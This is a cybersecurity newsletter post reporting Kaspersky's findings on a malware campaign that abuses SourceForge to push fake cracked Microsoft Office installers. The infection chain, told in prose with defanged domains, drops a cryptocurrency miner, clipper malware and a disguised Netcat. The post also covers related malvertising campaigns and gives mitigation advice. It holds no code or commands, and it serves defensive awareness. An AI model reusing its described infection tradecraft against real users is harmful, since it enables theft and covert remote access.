• Cyber Syrup
  • Posts
  • Malicious Software Campaign Uses SourceForge to Distribute Cryptocurrency Malware

Malicious Software Campaign Uses SourceForge to Distribute Cryptocurrency Malware

Cybersecurity researchers have uncovered an active malware campaign that exploits SourceForge to distribute malicious payloads

April 09, 2025

In partnership with

CYBER SYRUP
Delivering the sweetest insights on cybersecurity.

Learn AI in 5 minutes a day

This is the easiest way for a busy person wanting to learn AI in as little time as possible:

  1. Sign up for The Rundown AI newsletter

  2. They send you 5-minute email updates on the latest AI news and how to use it

  3. You learn how to become 2x more productive by leveraging AI

Malicious Software Campaign Uses SourceForge to Distribute Cryptocurrency Malware

Cybersecurity researchers have uncovered an active malware campaign that exploits SourceForge, a popular open-source software hosting platform, to distribute malicious payloads under the guise of cracked Microsoft Office applications. The goal of the campaign is to install cryptocurrency miners and clipper malware on victims' devices, particularly targeting Russian-speaking users.

Abuse of Open-Source Platforms

According to a new report from Kaspersky, attackers have created a SourceForge project named “officepackage”, mimicking legitimate Microsoft Office add-ins from GitHub. While the page appears benign at first glance, its Russian-language content and suspicious behavior raise red flags.

Each SourceForge project automatically receives a dedicated subdomain (e.g., officepackage.sourceforge[.]io). This site lists various Microsoft Office applications and download links, giving the impression of legitimacy. Hovering over these links reveals a familiar SourceForge URL (loading.sourceforge[.]io/download). However, clicking the link redirects users to a third-party domain hosted on taplink[.]cc.

The Infection Chain: From Click to Compromise

Users who follow the redirect are prompted to download a file named vinstaller.zip. Once extracted, this archive contains:

  • A password-protected ZIP file (installer.zip)

  • A text file containing the password

Inside the protected archive is an MSI installer, which:

  • Drops various files, including:

    • A console utility (UnRAR.exe)

    • A RAR archive

    • A Visual Basic (VB) script

The VB script executes a PowerShell command that downloads a batch file named confvk from GitHub. This script:

  • Retrieves the password for the RAR archive

  • Unpacks its contents

  • Executes additional payloads

The batch file launches two more PowerShell scripts:

  • One sends system metadata to a Telegram bot

  • The other downloads another script, which executes the final malware payloads, including a cryptocurrency miner and a ClipBanker (clipper malware)

Additionally, a tool called Netcat is deployed under the name ShellExperienceHost.exe to establish an encrypted remote connection with the attacker's server.

Targeted Victims and Geographic Focus

Kaspersky notes that 90% of the campaign's victims are located in Russia, with over 4,600 unique users affected between January and March 2025. This focus is evident from the Russian-language interface of the fake SourceForge page and its prominence in Yandex search results.

“As users seek ways to download applications outside official sources, attackers offer their own,” Kaspersky said. “While the attack primarily targets cryptocurrency by deploying a miner and ClipBanker, the attackers could sell system access to more dangerous actors.”

Broader Context: Malvertising and Fake Software Campaigns

This incident is part of a larger trend where attackers exploit public software platforms and search engines to spread malware.

Additional Campaigns Identified:

  1. TookPS Loader via Fake AI Tools
    Disguised as DeepSeek AI and other remote desktop applications, TookPS malware is delivered through Google ads and malicious websites (e.g., deepseek-ai-soft[.]com).

    • Drops PowerShell scripts to establish SSH-based remote access

    • Installs a modified TeviRat trojan

    • Uses DLL sideloading to manipulate TeamViewer for covert control

  2. Malicious Ads for RVTools (VMware Utility)
    Attackers serve tampered versions of RVTools using Google ads, embedding ThunderShell (aka SMOKEDHAM), a PowerShell-based remote access tool (RAT) used for command-and-control operations.

“ThunderShell is a post-exploitation framework used in red teaming and real-world attacks,” said researchers at Field Effect. “It allows remote operators to execute PowerShell commands on compromised systems through a command-and-control environment.”

Mitigation and Recommendations

For Individuals:

  • Avoid downloading software from unofficial sources, especially cracked versions

  • Use reputable antivirus and anti-malware software

  • Monitor system performance—unexpected slowdowns may indicate mining activity

For Organizations:

  • Educate staff about social engineering and malvertising risks

  • Implement web filtering to block known malicious domains

  • Use endpoint detection and response (EDR) tools to catch script-based malware

Conclusion

The abuse of platforms like SourceForge and the use of legitimate branding to distribute malware highlights the evolving sophistication of cybercriminals. Campaigns like PoisonSeed and TookPS show how attackers blend social engineering, open-source abuse, and malvertising to deliver malware at scale.

Staying vigilant and adopting best security practices are essential in mitigating these threats—especially in regions and sectors increasingly targeted by these evolving attack vectors.